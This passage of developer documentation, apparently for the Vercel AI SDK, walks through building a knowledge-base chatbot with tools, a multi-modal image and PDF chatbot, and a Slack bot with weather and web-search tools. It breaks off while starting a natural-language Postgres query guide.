Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
<p>
{m.content.length > 0 ? (
m.content
) : (
<span className="italic font-light">
{'calling tool: ' + m?.toolInvocations?.[0].toolName}
</span>
)}
</p>
</div>
</div>
))}
</div>
<form onSubmit={handleSubmit}>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={handleInputChange}
/>
</form>
</div>
);
}
With this change, you now conditionally render the tool that has been called directly in the UI. Save the file and head back to the browser. Tell the model your favorite movie. You should see which tool is called in place of the model's typical text response.
Improving UX with Multi-Step Calls
It would be nice if the model could summarize the action too. However, technically, once the model calls a tool, it has completed its generation as it ‘generated’ a tool call. How could you achieve this desired behaviour?
The AI SDK has a feature called maxSteps which will automatically send tool call results back to the model!
Open your root page (app/page.tsx) and add the following key to the useChat configuration object:
// ... Rest of your code
const { messages, input, handleInputChange, handleSubmit } = useChat({
maxSteps: 3,
});
// ... Rest of your code
Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.
Retrieve Resource Tool
The model can now add and embed arbitrary information to your knowledge base. However, it still isn’t able to query it. Let’s create a new tool to allow the model to answer questions by finding relevant information in your knowledge base.
To find similar content, you will need to embed the user's query, search the database for semantically similar content, and then pass those items to the model as context alongside the query. To achieve this, let's update your embedding logic file (lib/ai/embedding.ts):
import { embed, embedMany } from 'ai';
import { openai } from '@ai-sdk/openai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';
const embeddingModel = openai.embedding('text-embedding-ada-002');
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
export const generateEmbedding = async (value: string): Promise<number[]> => {
const input = value.replaceAll('\\n', ' ');
const { embedding } = await embed({
model: embeddingModel,
value: input,
});
return embedding;
};
export const findRelevantContent = async (userQuery: string) => {
const userQueryEmbedded = await generateEmbedding(userQuery);
const similarity = sql<number>`1 - (${cosineDistance(
embeddings.embedding,
userQueryEmbedded,
)})`;
const similarGuides = await db
.select({ name: embeddings.content, similarity })
.from(embeddings)
.where(gt(similarity, 0.5))
.orderBy(t => desc(t.similarity))
.limit(4);
return similarGuides;
};
In this code, you add two functions:
- generateEmbedding: generates a single embedding from an input string
- findRelevantContent: embeds the user's query, searches the database for similar items, then returns relevant items
With that done, it’s onto the final step: creating the tool.
Go back to your route handler (api/chat/route.ts) and add a new tool called getInformation:
import { createResource } from '@/lib/actions/resources';
import { openai } from '@ai-sdk/openai';
import { streamText, tool } from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages,
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
parameters: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
getInformation: tool({
description: `get information from your knowledge base to answer questions.`,
parameters: z.object({
question: z.string().describe('the users question'),
}),
execute: async ({ question }) => findRelevantContent(question),
}),
},
});
return result.toDataStreamResponse();
}
Head back to the browser, refresh the page, and ask for your favorite food. You should see the model call the getInformation tool, and then use the relevant information to formulate a response!
Conclusion
Congratulations, you have successfully built an AI chatbot that can dynamically add and retrieve information to and from a knowledge base. Throughout this guide, you learned how to create and store embeddings, set up server actions to manage resources, and use tools to extend the capabilities of your chatbot.
title: Multi-Modal Chatbot
description: Learn how to build a multi-modal chatbot that can process images and PDFs with the AI SDK.
tags: ['multi-modal', 'chatbot', 'images', 'pdf', 'vision', 'next']
Multi-Modal Chatbot
In this guide, you will build a multi-modal AI chatbot capable of understanding both images and PDFs.
Multi-modal refers to the ability of the chatbot to understand and generate responses in multiple formats, such as text, images, PDFs, and videos. In this example, we will focus on sending images and PDFs and generating text-based responses.
Different AI providers have varying levels of multi-modal support, for example:
- OpenAI (GPT-4o): Supports image input
- Anthropic (Sonnet 3.5): Supports image and PDF input
- Google (Gemini 2.0): Supports image and PDF input
We'll first build a chatbot capable of generating responses based on an image input using OpenAI, then show how to switch providers to handle PDFs.
Prerequisites
To follow this quickstart, you'll need:
- Node.js 18+ and pnpm installed on your local development machine.
- An OpenAI API key.
- An Anthropic API Key.
If you haven't obtained your OpenAI API key, you can do so by signing up on the OpenAI website.
If you haven't obtained your Anthropic API key, you can do so by signing up on Anthropic's website.
Create Your Application
Start by creating a new Next.js application. This command will create a new directory named multi-modal-chatbot and set up a basic Next.js application inside it.
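<Snippet text={['pnpm create next-app@latest multi-modal-chatbot']} />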
Navigate to the newly created directory:
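<Snippet text={['cd multi-modal-chatbot']} />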
Install dependencies
Install ai and @ai-sdk/openai, the AI SDK package and the AI SDK's OpenAI provider, respectively.
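<Snippet text={['pnpm add ai @ai-sdk/openai']} />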
Configure OpenAI API key
Create a .env.local file in your project root and add your OpenAI API Key. This key is used to authenticate your application with the OpenAI service.
Edit the .env.local file:
OPENAI_API_KEY=xxxxxxxxx
Replace xxxxxxxxx with your actual OpenAI API key.
Implementation Plan
To build a multi-modal chatbot, you will need to:
- Create a Route Handler to handle incoming chat messages and generate responses.
- Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
- Add the ability to upload images and attach them alongside the chat messages.
Create a Route Handler
Create a route handler, app/api/chat/route.ts and add the following code:
import { openai } from '@ai-sdk/openai';
import { streamText, convertToModelMessages, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Let's take a look at what is happening in this code:
- Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the chatbot and provides the chatbot with the necessary context to make the next generation.
- Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
- Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider (imported from @ai-sdk/openai) and messages (converted in step 2). You can pass additional settings to further customise the model's behaviour.
- The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function which converts the result to a streamed response object.
- Finally, return the result to the client to stream the response.
This Route Handler creates a POST request endpoint at /api/chat.
Wire up the UI
Now that you have a Route Handler that can query a large language model (LLM), it's time to set up your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.
Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.content}
</div>
))}
<form
onSubmit={handleSubmit}
className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={handleInputChange}
/>
</form>
</div>
);
}
This page utilizes the useChat hook, which will, by default, use the POST API route you created earlier (/api/chat). The hook provides functions and state for handling user input and form submission. The useChat hook provides multiple utility functions and state variables:
- messages - the current chat messages (an array of objects with id, role, and content properties).
- input - the current value of the user's input field.
- handleInputChange and handleSubmit - functions to handle user interactions (typing into the input field and submitting the form, respectively).
- status - the status of the API request.
Add Image Upload
To make your chatbot multi-modal, let's add the ability to upload and send images to the model. There are two ways to send attachments alongside a message with the useChat hook: by providing a FileList object or a list of URLs to the handleSubmit function. In this guide, you will be using the FileList approach as it does not require any additional setup.
Update your root page (app/page.tsx) with the following code:
'use client';
import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
import Image from 'next/image';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.content}
<div>
{m?.attachments
?.filter(attachment =>
attachment?.contentType?.startsWith('image/'),
)
.map((attachment, index) => (
<Image
key={`${m.id}-${index}`}
src={attachment.url}
width={500}
height={500}
alt={attachment.name ?? `attachment-${index}`}
/>
))}
</div>
</div>
))}
<form
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
onSubmit={event => {
handleSubmit(event, {
attachments: files,
});
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}}
>
<input
type="file"
className=""
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={handleInputChange}
/>
</form>
</div>
);
}
In this code, you:
- Create state to hold the files and create a ref to the file input field.
- Display the "uploaded" files in the UI.
- Update the onSubmit function to call the handleSubmit function manually, passing the files as an option using the attachments key.
- Add a file input field to the form, including an onChange handler to handle updating the files state.
Running Your Application
With that, you have built everything you need for your multi-modal chatbot! To start your application, use the command:
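<Snippet text={['pnpm run dev']} />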
Head to your browser and open http://localhost:3000. You should see an input field and a button to upload an image.
Upload an image and ask the model to describe what it sees. Watch as the model's response is streamed back to you!
Working with PDFs
To enable PDF support, you can switch to a provider that handles PDFs like Google's Gemini or Anthropic's Claude. Here's how to modify the code to use Anthropic:
- First install the Anthropic provider:
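<Snippet text={['pnpm add @ai-sdk/anthropic']} />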
- Update your environment variables:
OPENAI_API_KEY=xxxxxxxxx
ANTHROPIC_API_KEY=xxxxxxxxx
- Modify your route handler:
import { openai } from '@ai-sdk/openai';
import { anthropic } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, UIMessage } from 'ai';
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
// check if user has sent a PDF
const messagesHavePDF = messages.some(message =>
message.attachments?.some(a => a.contentType === 'application/pdf'),
);
const result = streamText({
model: messagesHavePDF
? anthropic('claude-3-5-sonnet-latest')
: openai('gpt-4o'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Now your chatbot can process both images and PDFs! PDF requests are automatically routed to Claude 3.5 Sonnet and image requests to OpenAI's gpt-4o model.
Finally, to display PDFs in your chat interface, update the message rendering code in your frontend to show PDF attachments in an <iframe>:
'use client';
import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
import Image from 'next/image';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.content}
<div>
{m?.attachments
?.filter(
attachment =>
attachment?.contentType?.startsWith('image/') ||
attachment?.contentType?.startsWith('application/pdf'),
)
.map((attachment, index) =>
attachment.contentType?.startsWith('image/') ? (
<Image
key={`${m.id}-${index}`}
src={attachment.url}
width={500}
height={500}
alt={attachment.name ?? `attachment-${index}`}
/>
) : attachment.contentType?.startsWith('application/pdf') ? (
<iframe
key={`${m.id}-${index}`}
src={attachment.url}
width={500}
height={600}
title={attachment.name ?? `attachment-${index}`}
/>
) : null,
)}
</div>
</div>
))}
<form
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
onSubmit={event => {
handleSubmit(event, {
attachments: files,
});
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}}
>
<input
type="file"
className=""
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={handleInputChange}
/>
</form>
</div>
);
}
Try uploading a PDF and asking questions about its contents.
Where to Next?
You've built a multi-modal AI chatbot using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling or introducing more granular control over AI and UI states.
If you are looking to leverage the broader capabilities of LLMs, Vercel AI SDK Core provides a comprehensive set of lower-level tools and APIs that will help you unlock a wider range of AI functionalities beyond the chatbot paradigm.
title: Slackbot Guide
description: Learn how to use the AI SDK to build an AI Slackbot.
tags: ['agents', 'chatbot']
Building a Slack AI Chatbot with the AI SDK
In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.
Slack App Setup
Before we start building, you'll need to create and configure a Slack app:
- Go to api.slack.com/apps
- Click "Create New App" and choose "From scratch"
- Give your app a name and select your workspace
- Under "OAuth & Permissions", add the following bot token scopes:
- app_mentions:read
- chat:write
- im:history
- im:write
- assistant:write
- Install the app to your workspace (button under "OAuth Tokens" subsection)
- Copy the Bot User OAuth Token and Signing Secret for the next step
- Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"
Project Setup
This project uses the following stack:
Getting Started
- Clone the repository and check out the starter branch
<Snippet text={[ 'git clone https://github.com/vercel-labs/ai-sdk-slackbot.git', 'cd ai-sdk-slackbot', 'git checkout starter', ]} />
- Install dependencies
<Snippet text={['pnpm install']} />
Project Structure
The starter repository already includes:
- Slack utilities (lib/slack-utils.ts) including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
- General utility functions (lib/utils.ts) including initial Exa setup
- Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
- An API endpoint (POST) for Slack events (api/events.ts)
Event Handler
First, let's take a look at our API route (api/events.ts):
import type { SlackEvent } from '@slack/web-api';
import {
assistantThreadMessage,
handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';
export async function POST(request: Request) {
const rawBody = await request.text();
const payload = JSON.parse(rawBody);
const requestType = payload.type as 'url_verification' | 'event_callback';
// See https://api.slack.com/events/url_verification
if (requestType === 'url_verification') {
return new Response(payload.challenge, { status: 200 });
}
await verifyRequest({ requestType, request, rawBody });
try {
const botUserId = await getBotId();
const event = payload.event as SlackEvent;
if (event.type === 'app_mention') {
waitUntil(handleNewAppMention(event, botUserId));
}
if (event.type === 'assistant_thread_started') {
waitUntil(assistantThreadMessage(event));
}
if (
event.type === 'message' &&
!event.subtype &&
event.channel_type === 'im' &&
!event.bot_id &&
!event.bot_profile &&
event.bot_id !== botUserId
) {
waitUntil(handleNewAssistantMessage(event, botUserId));
}
return new Response('Success!', { status: 200 });
} catch (error) {
console.error('Error generating response', error);
return new Response('Error generating response', { status: 500 });
}
}
This file defines a POST function that handles incoming requests from Slack. First, you check the request type to see if it's a URL verification request. If it is, you respond with the challenge string provided by Slack. If it's an event callback, you verify the request and then have access to the event data. This is where you can implement your event handling logic.
You then handle three types of events: app_mention, assistant_thread_started, and message:
- For app_mention, you call handleNewAppMention with the event and the bot user ID.
- For assistant_thread_started, you call assistantThreadMessage with the event.
- For message, you call handleNewAssistantMessage with the event and the bot user ID.
Finally, you respond with a success message to Slack. Note that each handler function is wrapped in a waitUntil call. Let's take a look at what this means and why it's important.
The waitUntil Function
Slack expects a response within 3 seconds to confirm the request is being handled. However, generating AI responses can take longer. If you don't respond to the Slack request within 3 seconds, Slack will send another request, leading to another invocation of your API route, another call to the LLM, and ultimately another response to the user. To solve this, you can use the waitUntil function, which allows you to run your AI logic after the response is sent, without blocking the response itself.
This means your API endpoint will:
- Immediately respond to Slack (within 3 seconds)
- Continue processing the message asynchronously
- Send the AI response when it's ready
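Stripped down, the pattern looks like this (a minimal sketch; doSlowAiWork stands in for your AI logic):
import { waitUntil } from '@vercel/functions';
export async function POST(request: Request) {
  // Schedule the slow AI work; it keeps running after the response is sent.
  waitUntil(doSlowAiWork(request));
  // Return immediately so Slack gets its acknowledgement within 3 seconds.
  return new Response('Success!', { status: 200 });
}
async function doSlowAiWork(request: Request) {
  // ...call the LLM and post the result back to Slack here
}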
Event Handlers
Let's look at how each event type is currently handled.
App Mentions
When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:
- Checks if the message is from a bot to avoid infinite response loops
- Creates a status updater to show the bot is "thinking"
- If the mention is in a thread, it retrieves the thread history
- Calls the LLM with the message content (using the generateResponse function, which you will implement in the next section)
- Updates the initial "thinking" message with the AI response
Here's the code for the handleNewAppMention function:
import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';
const updateStatusUtil = async (
initialStatus: string,
event: AppMentionEvent,
) => {
const initialMessage = await client.chat.postMessage({
channel: event.channel,
thread_ts: event.thread_ts ?? event.ts,
text: initialStatus,
});
if (!initialMessage || !initialMessage.ts)
throw new Error('Failed to post initial message');
const updateMessage = async (status: string) => {
await client.chat.update({
channel: event.channel,
ts: initialMessage.ts as string,
text: status,
});
};
return updateMessage;
};
export async function handleNewAppMention(
event: AppMentionEvent,
botUserId: string,
) {
console.log('Handling app mention');
if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
console.log('Skipping app mention');
return;
}
const { thread_ts, channel } = event;
const updateMessage = await updateStatusUtil('is thinking...', event);
if (thread_ts) {
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateMessage);
await updateMessage(result);
} else {
const result = await generateResponse(
[{ role: 'user', content: event.text }],
updateMessage,
);
await updateMessage(result);
}
}
Now let's see how new assistant threads and messages are handled.
Assistant Thread Messages
When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:
- Posts a welcome message to the thread
- Sets up suggested prompts to help users get started
Here's the code for the assistantThreadMessage function:
import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';
export async function assistantThreadMessage(
event: AssistantThreadStartedEvent,
) {
const { channel_id, thread_ts } = event.assistant_thread;
console.log(`Thread started: ${channel_id} ${thread_ts}`);
console.log(JSON.stringify(event));
await client.chat.postMessage({
channel: channel_id,
thread_ts: thread_ts,
text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
});
await client.assistant.threads.setSuggestedPrompts({
channel_id: channel_id,
thread_ts: thread_ts,
prompts: [
{
title: 'Get the weather',
message: 'What is the current weather in London?',
},
{
title: 'Get the news',
message: 'What is the latest Premier League news from the BBC?',
},
],
});
}
Direct Messages
For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:
- Verifies the message isn't from a bot
- Updates the status to show the response is being generated
- Retrieves the conversation history
- Calls the LLM with the conversation context
- Posts the LLM's response to the thread
Here's the code for the handleNewAssistantMessage function:
import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';
export async function handleNewAssistantMessage(
event: GenericMessageEvent,
botUserId: string,
) {
if (
event.bot_id ||
event.bot_id === botUserId ||
event.bot_profile ||
!event.thread_ts
)
return;
const { thread_ts, channel } = event;
const updateStatus = updateStatusUtil(channel, thread_ts);
await updateStatus('is thinking...');
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateStatus);
await client.chat.postMessage({
channel: channel,
thread_ts: thread_ts,
text: result,
unfurl_links: false,
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text: result,
},
},
],
});
await updateStatus('');
}
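Note that this handler uses a different updateStatusUtil than the app-mention handler. It isn't shown in the guide; here is a minimal sketch, assuming it wraps Slack's assistant.threads.setStatus API to drive the native assistant status indicator:
import { client } from './slack-utils';
// Returns an updater for the assistant thread's status indicator
// (e.g. "is thinking..."). Passing an empty string clears the status.
export function updateStatusUtil(channel: string, thread_ts: string) {
  return async (status: string) => {
    await client.assistant.threads.setStatus({
      channel_id: channel,
      thread_ts,
      status,
    });
  };
}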
With the event handlers in place, let's now implement the AI logic.
Implementing AI Logic
The core of our application is the generateResponse function in lib/ai.ts, which processes messages and generates responses using the AI SDK.
Here's how to implement it:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
import type { ModelMessage } from 'ai';
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: openai('gpt-4o-mini'),
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}`,
messages,
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
This basic implementation:
- Uses the AI SDK's generateText function to call OpenAI's gpt-4o-mini model
- Provides a system prompt to guide the model's behavior
- Formats the response for Slack's mrkdwn format
Enhancing with Tools
The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:
import { openai } from '@ai-sdk/openai';
import { generateText, tool } from 'ai';
import type { ModelMessage } from 'ai';
import { z } from 'zod';
import { exa } from './utils';
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: openai('gpt-4o'),
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}
- Always include sources in your final response if you use web search.`,
messages,
maxSteps: 10,
tools: {
getWeather: tool({
description: 'Get the current weather at a location',
parameters: z.object({
latitude: z.number(),
longitude: z.number(),
city: z.string(),
}),
execute: async ({ latitude, longitude, city }) => {
updateStatus?.(`is getting weather for ${city}...`);
const response = await fetch(
`https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
);
const weatherData = await response.json();
return {
temperature: weatherData.current.temperature_2m,
weatherCode: weatherData.current.weathercode,
humidity: weatherData.current.relativehumidity_2m,
city,
};
},
}),
searchWeb: tool({
description: 'Use this to search the web for information',
parameters: z.object({
query: z.string(),
specificDomain: z
.string()
.nullable()
.describe(
'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
),
}),
execute: async ({ query, specificDomain }) => {
updateStatus?.(`is searching the web for ${query}...`);
const { results } = await exa.searchAndContents(query, {
livecrawl: 'always',
numResults: 3,
includeDomains: specificDomain ? [specificDomain] : undefined,
});
return {
results: results.map(result => ({
title: result.title,
url: result.url,
snippet: result.text.slice(0, 1000),
})),
};
},
}),
},
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
In this updated implementation:
- You added two tools:
  - getWeather: Fetches weather data for a specified location
  - searchWeb: Searches the web for information using the Exa API
- You set maxSteps: 10 to enable multi-step conversations. This will automatically send any tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.
How It Works
When a user interacts with your bot:
- The Slack event is received and processed by your API endpoint
- The user's message and the thread history are passed to the generateResponse function
- The AI SDK processes the message and may invoke tools as needed
- The response is formatted for Slack and sent back to the user
The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:
- Recognize this as a weather query
- Call the getWeather tool with London's coordinates (inferred by the LLM)
- Process the weather data
- Generate a final response, answering the user's question
Deploying the App
- Install the Vercel CLI
<Snippet text={['pnpm install -g vercel']} />
- Deploy the app
<Snippet text={['vercel deploy']} />
- Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
- Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables
SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key
- Head back to api.slack.com and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL:
https://your-vercel-url.vercel.app/api/events
- On the Event Subscriptions page, subscribe to the following events:
app_mention
assistant_thread_started
message:im
Finally, head to Slack and test the app by sending a message to the bot.
Next Steps
You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:
- Add memory for specific users to give the LLM context of previous interactions
- Implement more tools like database queries or knowledge base searches
- Add support for rich message formatting with blocks
- Add analytics to track usage patterns
title: Natural Language Postgres description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language. tags: ['agents', 'next', 'tools']
Natural Language Postgres Guide
In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.
The application will:
- Generate SQL queries from a natural language input
- Explain query components in plain English
- Create a chart to visualise query results
You can find a completed version of this project at natural-language-postgres.vercel.app.
Project setup
This project uses the following stack:
- Next.js (App Router)
- AI SDK
- OpenAI
- Zod
- Postgres with Vercel Postgres
- shadcn-ui and TailwindCSS for styling
- Recharts for data visualization
Clone repo
To focus on the AI-powered functionality rather than project setup and configuration, we've prepared a starter repository which includes a database schema and a few components.
Clone the starter repository and check out the starter branch:
<Snippet text={[ 'git clone https://github.com/vercel-labs/natural-language-postgres', 'cd natural-language-postgres', 'git checkout starter', ]} />
Project setup and data
Let's set up the project and seed the database with the dataset:
- Install dependencies:
<Snippet text={['pnpm install']} />
- Copy the example environment variables file:
<Snippet text={['cp .env.example .env']} />
- Add your environment variables to .env:
OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."
- This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root
About the dataset
The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):
- Company name
- Valuation
- Date joined (unicorn status)
- Country
- City
- Industry
- Select investors
This dataset contains over 1,000 rows of data across 7 columns, giving us plenty of structured data to analyze. This makes it perfect for exploring various SQL queries that can reveal interesting insights about the unicorn startup ecosystem.
- Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:
<Snippet text={['pnpm run seed']} />
Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.
- Start the development server:
<Snippet text={['pnpm run dev']} />
Your application should now be running at http://localhost:3000.
Project structure
The starter repository already includes everything that you will need, including:
- Database seed script (lib/seed.ts)
- Basic components built with shadcn/ui (components/)
- Function to run SQL queries (app/actions.ts)
- Type definitions for the database schema (lib/types.ts)
Existing components
The application contains a single page in app/page.tsx that serves as the main interface.
At the top, you'll find a header (header.tsx) displaying the application title and description. Below that is an input field and search button (search.tsx) where you can enter natural language queries.
Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.
When you submit a query:
- The suggested queries section disappears and a loading state appears
- Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (query-viewer.tsx) which will eventually show your generated SQL
- Below that is an empty results area with "No results found" (results.tsx)
After you implement the core functionality:
- The results section will display data in a table format
- A toggle button will allow switching between table and chart views
- The chart view will visualize your query results
Let's implement the AI-powered functionality to bring it all together.
Building the application
As a reminder, this application will have three main features:
- Generate SQL queries from natural language
- Create a chart from the query results
- Explain SQL queries in plain English
For each of these features, you'll use the AI SDK via Server Actions to interact with OpenAI's GPT-4o and GPT-4o-mini models. Server Actions are a powerful React Server Component feature that allows you to call server-side functions directly from your frontend code.
Let's start with generating a SQL query from natural language.
Generate SQL queries
Providing context
For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:
- Schema information
- Example data formats
- Available SQL operations
- Best practices for query structure
- Nuanced advice for specific fields
Let's write a prompt that includes all of this information:
You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
Only retrieval queries are allowed.
For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').
Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (ie. "what is Vercel's valuation" would select company and valuation).
The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health
If the user asks for a category that is not in the list, infer based on the list above.
